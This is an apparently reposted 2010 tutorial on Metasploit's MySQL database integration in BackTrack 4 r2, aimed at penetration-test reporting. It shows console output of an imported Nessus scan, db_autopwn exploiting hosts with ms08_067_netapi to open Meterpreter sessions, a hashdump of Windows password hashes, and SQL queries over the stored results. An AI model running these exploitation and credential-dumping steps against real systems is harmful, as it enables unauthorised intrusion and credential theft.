Metasploit with MySQL in BackTrack 4 r2
Source: vfocus.net  Author: vfocus  Published: 2010-12-27

Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MySQL, but it was not an altogether seamless experience. Now, however, Metasploit and MySQL work together "out of the box", so we thought it would be worth highlighting the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. Quite a number of additional database commands have also been added to Metasploit, and online documentation tends to be rather sparse when it comes to the less "glamorous" side of database management.

root@bt:~# msfconsole

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 316 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11078 updated today (2010.11.19)

msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3

We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.

msf > db_driver mysql
[*] Using database driver mysql
msf > /etc/init.d/mysql start
[*] exec: /etc/init.d/mysql start

Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*]    Usage: db_connect <user:pass>@<host:port>/<database>
[*]       OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*]        db_connect user@metasploit3
[*]        db_connect user:pass@192.168.0.2/metasploit3
[*]        db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3

In order to have some hosts to use as targets and to show the information we can add to the database, we import a previously run Nessus scan using the db_import command. Metasploit will automatically detect the filetype and import it for us.

msf > db_import /root/nessus_report_EDB.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.69.50
[*] Importing host 192.168.69.199
[*] Importing host 192.168.69.175
[*] Importing host 192.168.69.173
[*] Importing host 192.168.69.171
[*] Importing host 192.168.69.146
[*] Importing host 192.168.69.143
[*] Importing host 192.168.69.142
[*] Importing host 192.168.69.141
[*] Importing host 192.168.69.140
[*] Importing host 192.168.69.130
[*] Importing host 192.168.69.110
[*] Importing host 192.168.69.105
[*] Importing host 192.168.69.100
[*] Successfully imported /root/nessus_report_EDB.nessus

After the successful import, our database should be populated with a number of hosts. Running db_hosts will query the database and allow us to customize the output.

msf > db_hosts -h
Usage: db_hosts [-h|--help] [-u|--up] [-a <addr1,addr2>] [-c <column1,column2>] [-o output-file ]

  -a <addr1,addr2>  Search for a list of addresses
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in csv format

Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at

msf > db_hosts -c address,mac

Hosts
=====

address         mac
-------         ---
192.168.69.100  00:0C:29:DE:1A:00
192.168.69.105  00:0C:29:9A:FC:E0
192.168.69.110  00:0C:29:69:9C:44
192.168.69.130  00:0C:29:6E:26:BB
192.168.69.140
192.168.69.141  00:0C:29:F3:40:70
192.168.69.142  00:0C:29:57:63:E2
192.168.69.143  00:0C:29:32:29:79
192.168.69.146
192.168.69.171  00:0C:29:EC:23:47
192.168.69.173  00:0C:29:45:7D:33
192.168.69.175  00:0C:29:BB:38:53
192.168.69.199  00:0C:29:58:09:DA
192.168.69.50

Far more interesting than IP and MAC addresses are the services running on our target systems, which is what db_services will show us.

msf > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a <addr1,addr2>] [-r <proto>] [-p <port1,port2>] [-n <name1,name2>]

  -a <addr1,addr2>  Search for a list of addresses
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -n <name1,name2>  Search for a list of service names
  -p <port1,port2>  Search for a list of ports
  -r <protocol>     Only show [tcp|udp] services
  -u,--up           Only show services which are up

Available columns: created_at, info, name, port, proto, state, updated_at

msf > db_services -c name,port,proto

Services
========

name            port   proto  Host            Workspace
----            ----   -----  ----            ---------
192.168.69.100  123    udp    192.168.69.100  default
192.168.69.100  135    tcp    192.168.69.100  default
192.168.69.100  137    udp    192.168.69.100  default
192.168.69.100  139    tcp    192.168.69.100  default
192.168.69.100  445    tcp    192.168.69.100  default
192.168.69.100  3389   tcp    192.168.69.100  default
192.168.69.105  123    udp    192.168.69.105  default
...snip...

Most interesting of all is the list of vulnerabilities that are mapped to our specific targets as found in the vulnerability scan. The db_vulns command will list the vulnerabilities along with their corresponding reference numbers, if applicable.

msf > db_vulns
[*] Time: Sat Nov 20 20:21:37 UTC 2010 Vuln: host=192.168.69.50 name=NSS- refs=
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26920 refs=CVE-1999-0519,CVE-1999-0520,CVE-2002-1117,BID-494,OSVDB-299
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26919 refs=CVE-1999-0505
...snip...

For the sake of brevity, we will just let db_autopwn exploit the low-hanging fruit for us and only run exploits with at least a “good” rating.

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex
-T  [secs]  Maximum runtime for any exploit in seconds

msf > db_autopwn -x -e -R good
[*] (1/30 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.69.175:139...
[*] (2/30 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.69.175:139...
...snip...
[*] Meterpreter session 1 opened (192.168.69.140:54342 -> 192.168.69.105:34160) at Sat Nov 20 15:45:24 -0500 2010
[*] Meterpreter session 2 opened (192.168.69.140:53895 -> 192.168.69.100:30423) at Sat Nov 20 15:45:24 -0500 2010
[*] (30/30 [2 sessions]): Waiting on 2 launched modules to finish execution...
[*] (30/30 [2 sessions]): Waiting on 0 launched modules to finish execution...

In a brief amount of time, Metasploit has delivered 2 Meterpreter sessions to us.

msf > sessions -l

Active sessions
===============

Id  Type                   Information                            Connection
--  ----                   -----------                            ----------
1   meterpreter x86/win32                                         192.168.69.140:54342 -> 192.168.69.105:34160
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ V-XPSP2-TEMPLAT  192.168.69.140:53895 -> 192.168.69.100:30423

Running db_exploited now will list not only the hosts that were exploited, but also the port and the exploit that succeeded against each of them.

msf > db_exploited
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.100 port=445 proto=tcp sname=192.168.69.100 exploit=exploit/windows/smb/ms08_067_netapi
[*] Found 2 exploited hosts.

Post exploitation is critical and you can frequently make use of credentials gathered to penetrate deeper into a target network. Metasploit has the db_add_cred command that allows you to insert credentials into the database as you come across them during your engagement.

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:616bd5bd6c74fb1e2207c34e6ce1c14f:fc631be480c73a749c15e311b8b877fd:::
lab:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:adc54aedfc47352ef9e20da3dd86ca63:::
meterpreter >
Background session 1? [y/N]
msf > db_add_cred 192.168.69.105 445 Administrator Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
msf > db_creds
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
[*] Found 1 credential.
msf >

All of these database features are very powerful and exciting, but just as exciting is that your entire session is now available in MySQL.

root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use msf3;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_msf3              |
+-----------------------------+
| attachments                 |
| attachments_email_templates |
| campaigns                   |
| clients                     |
| creds                       |
| email_addresses             |
| email_templates             |
| events                      |
| exploited_hosts             |
| hosts                       |
| imported_creds              |
| loots                       |
| notes                       |
| project_members             |
| refs                        |
| report_templates            |
| reports                     |
| schema_migrations           |
| services                    |
| tasks                       |
| users                       |
| vulns                       |
| vulns_refs                  |
| web_forms                   |
| web_pages                   |
| web_sites                   |
| web_templates               |
| web_vulns                   |
| wmap_requests               |
| wmap_targets                |
| workspaces                  |
+-----------------------------+
31 rows in set (0.00 sec)

We can now perform queries to access all of the information gathered on exploited hosts, gathered credentials, and much more.

mysql> select * from exploited_hosts;
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
| id | host_id | service_id | session_uuid | name                                | payload                              | created_at          | updated_at          |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
|  1 |      14 |        131 | oc5vd2zl     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
|  2 |      15 |        137 | qwtwtqfj     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
2 rows in set (0.00 sec)

mysql> select * from creds;
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
| id | service_id | created_at          | updated_at          | user          | pass                                                                                   | active | proof | ptype    | source_id | source_type |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
|  1 |        131 | 2010-11-20 20:54:36 | 2010-11-20 20:54:36 | Administrator | Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: |      1 | NULL  | password |      NULL | NULL        |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
1 row in set (0.00 sec)

mysql>

At first glance, database integration may not seem that compelling, but it opens the door for the community to develop customized reporting applications on top of a database as widely used as MySQL, easing the post-penetration-test reporting burden.
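As an added example of the kind of reporting the paragraph above has in mind (not code from the original post or from the Metasploit project), here are three queries over the msf3 tables listed earlier. The column names for exploited_hosts, creds and hosts come from the output on this page; the services.host_id and vulns.host_id foreign keys are assumed from the standard Metasploit schema of that era.

```sql
-- Added reporting queries (not part of the original post). Assumes the
-- msf3 schema shown above, plus the foreign keys services.host_id and
-- vulns.host_id that Metasploit's schema of this era uses.
USE msf3;

-- 1. Compromised hosts: which service fell, to which exploit and payload.
SELECT h.address,
       h.os_name,
       s.port,
       s.proto,
       e.name       AS exploit,
       e.payload,
       e.created_at AS exploited_at
FROM exploited_hosts e
JOIN hosts    h ON h.id = e.host_id
JOIN services s ON s.id = e.service_id
ORDER BY e.created_at, h.address;

-- 2. Credentials recorded with db_add_cred, mapped back to host and service
--    (the pass column is omitted on purpose; the report only needs the fact).
SELECT h.address,
       s.port,
       s.proto,
       c.user,
       c.ptype,
       c.created_at AS recorded_at
FROM creds c
JOIN services s ON s.id = c.service_id
JOIN hosts    h ON h.id = s.host_id
WHERE c.active = 1
ORDER BY h.address, s.port;

-- 3. Remediation view: hosts the Nessus import flagged with vulnerabilities
--    but that db_autopwn never obtained a session on, most findings first.
SELECT h.address,
       COUNT(v.id) AS vuln_count
FROM hosts h
JOIN vulns v ON v.host_id = h.id
WHERE h.id NOT IN (SELECT host_id FROM exploited_hosts)
GROUP BY h.address
ORDER BY vuln_count DESC, h.address;
```

The third query is the one worth handing to the client alongside db_exploited: it lists the findings that still need patching even though no exploit succeeded during the engagement.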

For further details on setting up and using the various databases in Metasploit, check out the Configuring Databases and Using the MSF Database sections in Metasploit Unleashed.
